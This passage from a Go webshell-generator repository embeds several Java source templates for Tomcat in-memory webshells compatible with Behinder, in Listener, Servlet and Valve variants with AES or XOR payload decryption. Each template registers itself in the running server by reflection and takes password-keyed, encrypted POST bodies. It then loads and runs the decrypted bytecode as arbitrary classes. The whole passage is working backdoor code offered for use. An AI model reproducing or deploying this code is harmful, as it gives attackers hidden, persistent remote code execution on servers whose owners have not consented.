} 252 | return null; 253 | } 254 | 255 | private void addListener(Object proxyObject) throws Exception { 256 | Object context = getStandardContext(); 257 | for (Object listener : 258 | (Object[]) invokeMethod(context, "getApplicationEventListeners") 259 | ) { 260 | if (listener instanceof Proxy) { 261 | return; 262 | } 263 | } 264 | getMethodX(context.getClass(), "addApplicationEventListener", 1) 265 | .invoke(context, proxyObject); 266 | } 267 | 268 | public TomcatListener() { 269 | synchronized(lock) { 270 | Class servletRequestListener = null; 271 | try { 272 | servletRequestListener = 
Class.forName( 273 | "javax.servlet.ServletRequestListener" 274 | ); 275 | } catch (ClassNotFoundException e) { 276 | try { 277 | servletRequestListener = Class.forName( 278 | "jakarta.servlet.ServletRequestListener" 279 | ); 280 | } catch (ClassNotFoundException ex) {} 281 | } 282 | 283 | if (servletRequestListener != null) { 284 | Object proxyObject = Proxy.newProxyInstance( 285 | getLoader(), new Class[]{servletRequestListener}, this 286 | ); 287 | try { 288 | addListener(proxyObject); 289 | } catch (Exception e) {} 290 | } 291 | } 292 | } 293 | 294 | static { 295 | new TomcatListener(); 296 | } 297 | } 298 | ` 299 | } 300 | 301 | func TomactSer() { 302 | common.Filename = "TomcatServlet.java" 303 | common.Webshells = ` 304 | import java.lang.reflect.*; 305 | import java.util.*; 306 | 307 | public class TomcatServlet implements InvocationHandler { 308 | private static String pattern = "*.xml"; 309 | private static String password = "` + common.Password + `"; 310 | 311 | private static Object lock = new Object(); 312 | 313 | private Field getField(Object obj, String fieldName) { 314 | Class clazz; 315 | Field field = null; 316 | if (obj == null) { 317 | return null; 318 | } 319 | if (obj instanceof Class) { 320 | clazz = (Class) obj; 321 | } else { 322 | clazz = obj.getClass(); 323 | } 324 | while (clazz != null) { 325 | try { 326 | field = clazz.getDeclaredField(fieldName); 327 | clazz = null; 328 | } catch (NoSuchFieldException e) { 329 | clazz = clazz.getSuperclass(); 330 | } 331 | } 332 | if (field != null) { 333 | try { 334 | Field mf = Field.class.getDeclaredField("modifiers"); 335 | mf.setAccessible(true); 336 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 337 | field.setAccessible(true); 338 | } catch (Exception e) {} 339 | } 340 | return field; 341 | } 342 | 343 | private Object getFieldValue(Object obj, String fieldName) { 344 | Field field; 345 | if (obj instanceof Field) { 346 | field = (Field) obj; 347 | } else { 348 | field = 
getField(obj, fieldName); 349 | } 350 | try { 351 | return field.get(obj); 352 | } catch (IllegalAccessException e) { 353 | return null; 354 | } 355 | } 356 | 357 | private Method getMethodX(Class clazz, String methodName, int num) { 358 | Method[] methods = clazz.getDeclaredMethods(); 359 | for (Method method : methods) { 360 | if (method.getName().equals(methodName)) { 361 | if (method.getParameterTypes().length == num) { 362 | return method; 363 | } 364 | } 365 | } 366 | return null; 367 | } 368 | 369 | private Method getMethod(Class clazz, String methodName, Class... args) { 370 | Method method = null; 371 | while (clazz != null) { 372 | try { 373 | method = clazz.getDeclaredMethod(methodName, args); 374 | clazz = null; 375 | } catch (NoSuchMethodException e) { 376 | clazz = clazz.getSuperclass(); 377 | } 378 | } 379 | return method; 380 | } 381 | 382 | private Object invokeMethod( 383 | Object obj, String methodName, Object... args 384 | ) { 385 | ArrayList clazzs = new ArrayList(); 386 | if (args != null) { 387 | for (int i=0; i keySet = catalina.keySet().iterator(); 457 | while(keySet.hasNext()) { 458 | String key = keySet.next(); 459 | if (key.contains("NonLoginAuthenticator")) { 460 | nonLoginAuthenticator = catalina.get(key); 461 | break; 462 | } 463 | } 464 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 465 | Object resource = getFieldValue(object, "resource"); 466 | return getFieldValue(resource, "context"); 467 | } 468 | 469 | 470 | private byte[] cipher( 471 | byte[] payload, String alg, byte[] key, boolean isEnc 472 | ) { 473 | try { 474 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance(alg); 475 | c.init(isEnc?1:2, new javax.crypto.spec.SecretKeySpec(key, alg)); 476 | return c.doFinal(payload); 477 | } catch (Exception e) { 478 | return null; 479 | } 480 | } 481 | 482 | private String hasher(String str, String alg) { 483 | try { 484 | java.security.MessageDigest h = 485 | java.security.MessageDigest.getInstance(alg); 486 | 
h.update(str.getBytes(), 0, str.length()); 487 | return new java.math.BigInteger(1, h.digest()).toString(16); 488 | } catch (Exception e) { 489 | return null; 490 | } 491 | } 492 | 493 | private byte[] decoder(String payload) { 494 | return cipher( 495 | b64decode(payload), "AES", 496 | hasher(password, "MD5").substring(0, 16).getBytes(), false 497 | ); 498 | } 499 | 500 | 501 | private String stub(String payload, Object request, Object response) 502 | throws Exception { 503 | if (invokeMethod(request, "getMethod").equals("POST")) { 504 | payload = (String) invokeMethod( 505 | invokeMethod(request, "getReader"),"readLine" 506 | ); 507 | java.util.HashMap pageContext = new java.util.HashMap(); 508 | Object session = invokeMethod(request, "getSession"); 509 | pageContext.put("request", request); 510 | pageContext.put("response", response); 511 | pageContext.put("session", session); 512 | invokeMethod(session, "putValue", 513 | 'u', hasher(password, "MD5").substring(0, 16)); 514 | byte[] b = decoder(payload); 515 | Constructor constructor = java.security.SecureClassLoader.class 516 | .getDeclaredConstructor(ClassLoader.class); 517 | constructor.setAccessible(true); 518 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 519 | new Object[]{this.getClass().getClassLoader()} 520 | ); 521 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 522 | "defineClass", byte[].class, int.class, int.class 523 | ); 524 | defineMethod.setAccessible(true); 525 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 526 | .newInstance().equals(pageContext); 527 | } 528 | return null; 529 | } 530 | 531 | private void hook(Object servletRequest, Object servletResponse) 532 | throws Exception { 533 | String payload = (String) invokeMethod( 534 | servletRequest, "getParameter", password 535 | ); 536 | stub(payload, servletRequest, servletResponse); 537 | } 538 | 539 | @Override 540 | public Object invoke(Object proxy, Method method, Object[] args) 541 | throws 
Throwable { 542 | if (method.getName().equals("service")) { 543 | Object servletRequest = args[0]; 544 | Object servletResponse = args[1]; 545 | hook(servletRequest, servletResponse); 546 | } 547 | return null; 548 | } 549 | 550 | private void addSevlet(Object proxyObject) throws Exception { 551 | Object context = getStandardContext(); 552 | Object wrapper = invokeMethod(context, "createWrapper"); 553 | String name = this.getClass().getName(); 554 | invokeMethod(wrapper, "setServletName", name); 555 | invokeMethod(wrapper, "setLoadOnStartupString", "1"); 556 | getField(wrapper, "instance").set(wrapper, proxyObject); 557 | invokeMethod( 558 | wrapper, "setServletClass", proxyObject.getClass().getName() 559 | ); 560 | getMethodX(context.getClass(), "addChild", 1).invoke(context, wrapper); 561 | getMethodX(context.getClass(), "addServletMappingDecoded", 3) 562 | .invoke(context, pattern, name, false); 563 | } 564 | 565 | public TomcatServlet() { 566 | synchronized(lock) { 567 | Class servletClass = null; 568 | try { 569 | servletClass = Class.forName( 570 | "javax.servlet.Servlet" 571 | ); 572 | } catch (ClassNotFoundException e) { 573 | try { 574 | servletClass = Class.forName( 575 | "jakarta.servlet.Servlet" 576 | ); 577 | } catch (ClassNotFoundException ex) {} 578 | } 579 | 580 | if (servletClass != null) { 581 | Object proxyObject = Proxy.newProxyInstance( 582 | getLoader(), new Class[]{servletClass}, this 583 | ); 584 | try { 585 | addSevlet(proxyObject); 586 | } catch (Exception e) {} 587 | } 588 | } 589 | } 590 | 591 | static { 592 | new TomcatServlet(); 593 | } 594 | } 595 | ` 596 | } 597 | 598 | func TomactVa() { 599 | common.Filename = "TomcatValve.java" 600 | common.Webshells = ` 601 | import java.lang.reflect.*; 602 | import java.util.*; 603 | 604 | public class TomcatValve implements InvocationHandler { 605 | private static String password = "` + common.Password + `"; 606 | private static Object nextvalve = null; 607 | 608 | private static Object lock = 
new Object(); 609 | 610 | private Field getField(Object obj, String fieldName) { 611 | Class clazz; 612 | Field field = null; 613 | if (obj == null) { 614 | return null; 615 | } 616 | if (obj instanceof Class) { 617 | clazz = (Class) obj; 618 | } else { 619 | clazz = obj.getClass(); 620 | } 621 | while (clazz != null) { 622 | try { 623 | field = clazz.getDeclaredField(fieldName); 624 | clazz = null; 625 | } catch (NoSuchFieldException e) { 626 | clazz = clazz.getSuperclass(); 627 | } 628 | } 629 | if (field != null) { 630 | try { 631 | Field mf = Field.class.getDeclaredField("modifiers"); 632 | mf.setAccessible(true); 633 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 634 | field.setAccessible(true); 635 | } catch (Exception e) {} 636 | } 637 | return field; 638 | } 639 | 640 | private Object getFieldValue(Object obj, String fieldName) { 641 | Field field; 642 | if (obj instanceof Field) { 643 | field = (Field) obj; 644 | } else { 645 | field = getField(obj, fieldName); 646 | } 647 | try { 648 | return field.get(obj); 649 | } catch (IllegalAccessException e) { 650 | return null; 651 | } 652 | } 653 | 654 | private Method getMethodX(Class clazz, String methodName, int num) { 655 | Method[] methods = clazz.getDeclaredMethods(); 656 | for (Method method : methods) { 657 | if (method.getName().equals(methodName)) { 658 | if (method.getParameterTypes().length == num) { 659 | return method; 660 | } 661 | } 662 | } 663 | return null; 664 | } 665 | 666 | private Method getMethod(Class clazz, String methodName, Class... args) { 667 | Method method = null; 668 | while (clazz != null) { 669 | try { 670 | method = clazz.getDeclaredMethod(methodName, args); 671 | clazz = null; 672 | } catch (NoSuchMethodException e) { 673 | clazz = clazz.getSuperclass(); 674 | } 675 | } 676 | return method; 677 | } 678 | 679 | private Object invokeMethod( 680 | Object obj, String methodName, Object... 
args 681 | ) { 682 | ArrayList clazzs = new ArrayList(); 683 | if (args != null) { 684 | for (int i=0; i keySet = catalina.keySet().iterator(); 754 | while(keySet.hasNext()) { 755 | String key = keySet.next(); 756 | if (key.contains("NonLoginAuthenticator")) { 757 | nonLoginAuthenticator = catalina.get(key); 758 | break; 759 | } 760 | } 761 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 762 | Object resource = getFieldValue(object, "resource"); 763 | return getFieldValue(resource, "context"); 764 | } 765 | 766 | 767 | private byte[] cipher( 768 | byte[] payload, String alg, byte[] key, boolean isEnc 769 | ) { 770 | try { 771 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance(alg); 772 | c.init(isEnc?1:2, new javax.crypto.spec.SecretKeySpec(key, alg)); 773 | return c.doFinal(payload); 774 | } catch (Exception e) { 775 | return null; 776 | } 777 | } 778 | 779 | private String hasher(String str, String alg) { 780 | try { 781 | java.security.MessageDigest h = 782 | java.security.MessageDigest.getInstance(alg); 783 | h.update(str.getBytes(), 0, str.length()); 784 | return new java.math.BigInteger(1, h.digest()).toString(16); 785 | } catch (Exception e) { 786 | return null; 787 | } 788 | } 789 | 790 | private byte[] decoder(String payload) { 791 | return cipher( 792 | b64decode(payload), "AES", 793 | hasher(password, "MD5").substring(0, 16).getBytes(), false 794 | ); 795 | } 796 | 797 | 798 | private String stub(String payload, Object request, Object response) 799 | throws Exception { 800 | if (invokeMethod(request, "getMethod").equals("POST")) { 801 | payload = (String) invokeMethod( 802 | invokeMethod(request, "getReader"),"readLine" 803 | ); 804 | java.util.HashMap pageContext = new java.util.HashMap(); 805 | Object session = invokeMethod(request, "getSession"); 806 | pageContext.put("request", request); 807 | pageContext.put("response", response); 808 | pageContext.put("session", session); 809 | invokeMethod(session, "putValue", 810 | 'u', 
hasher(password, "MD5").substring(0, 16)); 811 | byte[] b = decoder(payload); 812 | Constructor constructor = java.security.SecureClassLoader.class 813 | .getDeclaredConstructor(ClassLoader.class); 814 | constructor.setAccessible(true); 815 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 816 | new Object[]{this.getClass().getClassLoader()} 817 | ); 818 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 819 | "defineClass", byte[].class, int.class, int.class 820 | ); 821 | defineMethod.setAccessible(true); 822 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 823 | .newInstance().equals(pageContext); 824 | } 825 | return null; 826 | } 827 | 828 | private void hook(Object request, Object response) throws Exception { 829 | String payload = (String) invokeMethod( 830 | request, "getParameter", password 831 | ); 832 | stub(payload, request, response); 833 | } 834 | 835 | @Override 836 | public Object invoke(Object proxy, Method method, Object[] args) 837 | throws Throwable { 838 | String methodName = method.getName(); 839 | if (methodName.equals("invoke")) { 840 | Object request = args[0]; 841 | Object response = args[1]; 842 | hook(request, response); 843 | Method invoke = getMethodX(nextvalve.getClass(), "invoke", 2); 844 | invoke.setAccessible(true); 845 | invoke.invoke(nextvalve, request, response); 846 | } else if (methodName.equals("setNext")) { 847 | nextvalve = args[0]; 848 | } else if (methodName.equals("getNext")) { 849 | return nextvalve; 850 | } else if (methodName.equals("toString")) { 851 | return this.getClass().getName(); 852 | } else if (methodName.equals("isAsyncSupported")) { 853 | return false; 854 | } 855 | return null; 856 | } 857 | 858 | private void addValve(Object proxyObject) throws Exception { 859 | Object context = getStandardContext(); 860 | Object pipeline = invokeMethod(context, "getPipeline"); 861 | getMethodX(pipeline.getClass(), "addValve", 1) 862 | .invoke(pipeline, proxyObject); 863 | } 864 | 
865 | public TomcatValve() { 866 | synchronized(lock) { 867 | Class valveClass = null; 868 | try { 869 | valveClass = Class.forName( 870 | "org.apache.catalina.Valve" 871 | ); 872 | } catch (ClassNotFoundException e) {} 873 | 874 | if (valveClass != null) { 875 | Object proxyObject = Proxy.newProxyInstance( 876 | getLoader(), 877 | new Class[]{valveClass}, 878 | this 879 | ); 880 | try { 881 | addValve(proxyObject); 882 | } catch (Exception e) {} 883 | } 884 | } 885 | } 886 | 887 | static { 888 | new TomcatValve(); 889 | } 890 | } 891 | ` 892 | } 893 | -------------------------------------------------------------------------------- /shell/memory/Behinder/Betomcat/Bettxor.go: -------------------------------------------------------------------------------- 1 | package Betomcat 2 | 3 | import "webshell/common" 4 | 5 | func TomXorbL() { 6 | common.Filename = "TomcatListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class TomcatListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj 
instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i keySet = catalina.keySet().iterator(); 159 | while(keySet.hasNext()) { 160 | String key = keySet.next(); 161 | if (key.contains("NonLoginAuthenticator")) { 162 | nonLoginAuthenticator = catalina.get(key); 163 | break; 164 | } 165 | } 166 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 167 | Object resource = getFieldValue(object, "resource"); 168 | return getFieldValue(resource, "context"); 169 | } 170 | 171 | 172 | private byte[] cipher( 173 | byte[] payload, String alg, byte[] key, boolean isEnc 174 | ) { 175 | try { 176 | byte[] result = new byte[payload.length]; 177 | for (int i = 0; i < result.length; i++) { 178 | result[i] = (byte) (payload[i] ^ key[i + 1 & 15]); 179 | } 180 | return result; 181 | } catch (Exception e) { 182 | return null; 183 | } 184 | } 185 | 186 | private String hasher(String str, String alg) { 187 | try { 188 | java.security.MessageDigest h = 189 | 
java.security.MessageDigest.getInstance(alg); 190 | h.update(str.getBytes(), 0, str.length()); 191 | return new java.math.BigInteger(1, h.digest()).toString(16); 192 | } catch (Exception e) { 193 | return null; 194 | } 195 | } 196 | 197 | private byte[] decoder(String payload) { 198 | return cipher( 199 | b64decode(payload), "XOR", 200 | hasher(password, "MD5").substring(0, 16).getBytes(), false 201 | ); 202 | } 203 | 204 | 205 | private String stub(String payload, Object request, Object response) 206 | throws Exception { 207 | if (invokeMethod(request, "getMethod").equals("POST")) { 208 | payload = (String) invokeMethod( 209 | invokeMethod(request, "getReader"),"readLine" 210 | ); 211 | java.util.HashMap pageContext = new java.util.HashMap(); 212 | Object session = invokeMethod(request, "getSession"); 213 | pageContext.put("request", request); 214 | pageContext.put("response", response); 215 | pageContext.put("session", session); 216 | invokeMethod(session, "putValue", 217 | 'u', hasher(password, "MD5").substring(0, 16)); 218 | byte[] b = decoder(payload); 219 | Constructor constructor = java.security.SecureClassLoader.class 220 | .getDeclaredConstructor(ClassLoader.class); 221 | constructor.setAccessible(true); 222 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 223 | new Object[]{this.getClass().getClassLoader()} 224 | ); 225 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 226 | "defineClass", byte[].class, int.class, int.class 227 | ); 228 | defineMethod.setAccessible(true); 229 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 230 | .newInstance().equals(pageContext); 231 | } 232 | return null; 233 | } 234 | 235 | private void hook(Object servletRequestEvent) throws Exception { 236 | Object servletRequest = invokeMethod( 237 | servletRequestEvent, "getServletRequest" 238 | ); 239 | Object request = getFieldValue(servletRequest, "request"); 240 | Object response = invokeMethod(request, "getResponse"); 241 | String 
payload = (String) invokeMethod( 242 | servletRequest, "getParameter", password 243 | ); 244 | stub(payload, request, response); 245 | } 246 | 247 | @Override 248 | public Object invoke(Object proxy, Method method, Object[] args) 249 | throws Throwable { 250 | if (method.getName().equals("requestInitialized")) { 251 | Object servletRequestEvent = args[0]; 252 | hook(servletRequestEvent); 253 | } 254 | return null; 255 | } 256 | 257 | private void addListener(Object proxyObject) throws Exception { 258 | Object context = getStandardContext(); 259 | for (Object listener : 260 | (Object[]) invokeMethod(context, "getApplicationEventListeners") 261 | ) { 262 | if (listener instanceof Proxy) { 263 | return; 264 | } 265 | } 266 | getMethodX(context.getClass(), "addApplicationEventListener", 1) 267 | .invoke(context, proxyObject); 268 | } 269 | 270 | public TomcatListener() { 271 | synchronized(lock) { 272 | Class servletRequestListener = null; 273 | try { 274 | servletRequestListener = Class.forName( 275 | "javax.servlet.ServletRequestListener" 276 | ); 277 | } catch (ClassNotFoundException e) { 278 | try { 279 | servletRequestListener = Class.forName( 280 | "jakarta.servlet.ServletRequestListener" 281 | ); 282 | } catch (ClassNotFoundException ex) {} 283 | } 284 | 285 | if (servletRequestListener != null) { 286 | Object proxyObject = Proxy.newProxyInstance( 287 | getLoader(), new Class[]{servletRequestListener}, this 288 | ); 289 | try { 290 | addListener(proxyObject); 291 | } catch (Exception e) {} 292 | } 293 | } 294 | } 295 | 296 | static { 297 | new TomcatListener(); 298 | } 299 | } 300 | ` 301 | } 302 | 303 | func TomcatXorSebe() { 304 | common.Filename = "TomcatServlet.java" 305 | common.Webshells = `import java.lang.reflect.*; 306 | import java.util.*; 307 | 308 | public class TomcatServlet implements InvocationHandler { 309 | private static String pattern = "*.xml"; 310 | private static String password = "` + common.Password + `"; 311 | 312 | private static Object 
lock = new Object(); 313 | 314 | private Field getField(Object obj, String fieldName) { 315 | Class clazz; 316 | Field field = null; 317 | if (obj == null) { 318 | return null; 319 | } 320 | if (obj instanceof Class) { 321 | clazz = (Class) obj; 322 | } else { 323 | clazz = obj.getClass(); 324 | } 325 | while (clazz != null) { 326 | try { 327 | field = clazz.getDeclaredField(fieldName); 328 | clazz = null; 329 | } catch (NoSuchFieldException e) { 330 | clazz = clazz.getSuperclass(); 331 | } 332 | } 333 | if (field != null) { 334 | try { 335 | Field mf = Field.class.getDeclaredField("modifiers"); 336 | mf.setAccessible(true); 337 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 338 | field.setAccessible(true); 339 | } catch (Exception e) {} 340 | } 341 | return field; 342 | } 343 | 344 | private Object getFieldValue(Object obj, String fieldName) { 345 | Field field; 346 | if (obj instanceof Field) { 347 | field = (Field) obj; 348 | } else { 349 | field = getField(obj, fieldName); 350 | } 351 | try { 352 | return field.get(obj); 353 | } catch (IllegalAccessException e) { 354 | return null; 355 | } 356 | } 357 | 358 | private Method getMethodX(Class clazz, String methodName, int num) { 359 | Method[] methods = clazz.getDeclaredMethods(); 360 | for (Method method : methods) { 361 | if (method.getName().equals(methodName)) { 362 | if (method.getParameterTypes().length == num) { 363 | return method; 364 | } 365 | } 366 | } 367 | return null; 368 | } 369 | 370 | private Method getMethod(Class clazz, String methodName, Class... args) { 371 | Method method = null; 372 | while (clazz != null) { 373 | try { 374 | method = clazz.getDeclaredMethod(methodName, args); 375 | clazz = null; 376 | } catch (NoSuchMethodException e) { 377 | clazz = clazz.getSuperclass(); 378 | } 379 | } 380 | return method; 381 | } 382 | 383 | private Object invokeMethod( 384 | Object obj, String methodName, Object... 
args 385 | ) { 386 | ArrayList clazzs = new ArrayList(); 387 | if (args != null) { 388 | for (int i=0; i keySet = catalina.keySet().iterator(); 458 | while(keySet.hasNext()) { 459 | String key = keySet.next(); 460 | if (key.contains("NonLoginAuthenticator")) { 461 | nonLoginAuthenticator = catalina.get(key); 462 | break; 463 | } 464 | } 465 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 466 | Object resource = getFieldValue(object, "resource"); 467 | return getFieldValue(resource, "context"); 468 | } 469 | 470 | 471 | private byte[] cipher( 472 | byte[] payload, String alg, byte[] key, boolean isEnc 473 | ) { 474 | try { 475 | byte[] result = new byte[payload.length]; 476 | for (int i = 0; i < result.length; i++) { 477 | result[i] = (byte) (payload[i] ^ key[i + 1 & 15]); 478 | } 479 | return result; 480 | } catch (Exception e) { 481 | return null; 482 | } 483 | } 484 | 485 | private String hasher(String str, String alg) { 486 | try { 487 | java.security.MessageDigest h = 488 | java.security.MessageDigest.getInstance(alg); 489 | h.update(str.getBytes(), 0, str.length()); 490 | return new java.math.BigInteger(1, h.digest()).toString(16); 491 | } catch (Exception e) { 492 | return null; 493 | } 494 | } 495 | 496 | private byte[] decoder(String payload) { 497 | return cipher( 498 | b64decode(payload), "XOR", 499 | hasher(password, "MD5").substring(0, 16).getBytes(), false 500 | ); 501 | } 502 | 503 | 504 | private String stub(String payload, Object request, Object response) 505 | throws Exception { 506 | if (invokeMethod(request, "getMethod").equals("POST")) { 507 | payload = (String) invokeMethod( 508 | invokeMethod(request, "getReader"),"readLine" 509 | ); 510 | java.util.HashMap pageContext = new java.util.HashMap(); 511 | Object session = invokeMethod(request, "getSession"); 512 | pageContext.put("request", request); 513 | pageContext.put("response", response); 514 | pageContext.put("session", session); 515 | invokeMethod(session, "putValue", 516 
| 'u', hasher(password, "MD5").substring(0, 16)); 517 | byte[] b = decoder(payload); 518 | Constructor constructor = java.security.SecureClassLoader.class 519 | .getDeclaredConstructor(ClassLoader.class); 520 | constructor.setAccessible(true); 521 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 522 | new Object[]{this.getClass().getClassLoader()} 523 | ); 524 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 525 | "defineClass", byte[].class, int.class, int.class 526 | ); 527 | defineMethod.setAccessible(true); 528 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 529 | .newInstance().equals(pageContext); 530 | } 531 | return null; 532 | } 533 | 534 | private void hook(Object servletRequest, Object servletResponse) 535 | throws Exception { 536 | String payload = (String) invokeMethod( 537 | servletRequest, "getParameter", password 538 | ); 539 | stub(payload, servletRequest, servletResponse); 540 | } 541 | 542 | @Override 543 | public Object invoke(Object proxy, Method method, Object[] args) 544 | throws Throwable { 545 | if (method.getName().equals("service")) { 546 | Object servletRequest = args[0]; 547 | Object servletResponse = args[1]; 548 | hook(servletRequest, servletResponse); 549 | } 550 | return null; 551 | } 552 | 553 | private void addSevlet(Object proxyObject) throws Exception { 554 | Object context = getStandardContext(); 555 | Object wrapper = invokeMethod(context, "createWrapper"); 556 | String name = this.getClass().getName(); 557 | invokeMethod(wrapper, "setServletName", name); 558 | invokeMethod(wrapper, "setLoadOnStartupString", "1"); 559 | getField(wrapper, "instance").set(wrapper, proxyObject); 560 | invokeMethod( 561 | wrapper, "setServletClass", proxyObject.getClass().getName() 562 | ); 563 | getMethodX(context.getClass(), "addChild", 1).invoke(context, wrapper); 564 | getMethodX(context.getClass(), "addServletMappingDecoded", 3) 565 | .invoke(context, pattern, name, false); 566 | } 567 | 568 | public 
TomcatServlet() { 569 | synchronized(lock) { 570 | Class servletClass = null; 571 | try { 572 | servletClass = Class.forName( 573 | "javax.servlet.Servlet" 574 | ); 575 | } catch (ClassNotFoundException e) { 576 | try { 577 | servletClass = Class.forName( 578 | "jakarta.servlet.Servlet" 579 | ); 580 | } catch (ClassNotFoundException ex) {} 581 | } 582 | 583 | if (servletClass != null) { 584 | Object proxyObject = Proxy.newProxyInstance( 585 | getLoader(), new Class[]{servletClass}, this 586 | ); 587 | try { 588 | addSevlet(proxyObject); 589 | } catch (Exception e) {} 590 | } 591 | } 592 | } 593 | 594 | static { 595 | new TomcatServlet(); 596 | } 597 | } 598 | ` 599 | } 600 | 601 | func TomcatXorVabe() { 602 | common.Filename = "TomcatValve.java" 603 | common.Webshells = ` 604 | import java.lang.reflect.*; 605 | import java.util.*; 606 | 607 | public class TomcatValve implements InvocationHandler { 608 | private static String password = "` + common.Password + `"; 609 | private static Object nextvalve = null; 610 | 611 | private static Object lock = new Object(); 612 | 613 | private Field getField(Object obj, String fieldName) { 614 | Class clazz; 615 | Field field = null; 616 | if (obj == null) { 617 | return null; 618 | } 619 | if (obj instanceof Class) { 620 | clazz = (Class) obj; 621 | } else { 622 | clazz = obj.getClass(); 623 | } 624 | while (clazz != null) { 625 | try { 626 | field = clazz.getDeclaredField(fieldName); 627 | clazz = null; 628 | } catch (NoSuchFieldException e) { 629 | clazz = clazz.getSuperclass(); 630 | } 631 | } 632 | if (field != null) { 633 | try { 634 | Field mf = Field.class.getDeclaredField("modifiers"); 635 | mf.setAccessible(true); 636 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 637 | field.setAccessible(true); 638 | } catch (Exception e) {} 639 | } 640 | return field; 641 | } 642 | 643 | private Object getFieldValue(Object obj, String fieldName) { 644 | Field field; 645 | if (obj instanceof Field) { 646 | field = 
(Field) obj; 647 | } else { 648 | field = getField(obj, fieldName); 649 | } 650 | try { 651 | return field.get(obj); 652 | } catch (IllegalAccessException e) { 653 | return null; 654 | } 655 | } 656 | 657 | private Method getMethodX(Class clazz, String methodName, int num) { 658 | Method[] methods = clazz.getDeclaredMethods(); 659 | for (Method method : methods) { 660 | if (method.getName().equals(methodName)) { 661 | if (method.getParameterTypes().length == num) { 662 | return method; 663 | } 664 | } 665 | } 666 | return null; 667 | } 668 | 669 | private Method getMethod(Class clazz, String methodName, Class... args) { 670 | Method method = null; 671 | while (clazz != null) { 672 | try { 673 | method = clazz.getDeclaredMethod(methodName, args); 674 | clazz = null; 675 | } catch (NoSuchMethodException e) { 676 | clazz = clazz.getSuperclass(); 677 | } 678 | } 679 | return method; 680 | } 681 | 682 | private Object invokeMethod( 683 | Object obj, String methodName, Object... args 684 | ) { 685 | ArrayList clazzs = new ArrayList(); 686 | if (args != null) { 687 | for (int i=0; i keySet = catalina.keySet().iterator(); 757 | while(keySet.hasNext()) { 758 | String key = keySet.next(); 759 | if (key.contains("NonLoginAuthenticator")) { 760 | nonLoginAuthenticator = catalina.get(key); 761 | break; 762 | } 763 | } 764 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 765 | Object resource = getFieldValue(object, "resource"); 766 | return getFieldValue(resource, "context"); 767 | } 768 | 769 | 770 | private byte[] cipher( 771 | byte[] payload, String alg, byte[] key, boolean isEnc 772 | ) { 773 | try { 774 | byte[] result = new byte[payload.length]; 775 | for (int i = 0; i < result.length; i++) { 776 | result[i] = (byte) (payload[i] ^ key[i + 1 & 15]); 777 | } 778 | return result; 779 | } catch (Exception e) { 780 | return null; 781 | } 782 | } 783 | 784 | private String hasher(String str, String alg) { 785 | try { 786 | java.security.MessageDigest h = 787 | 
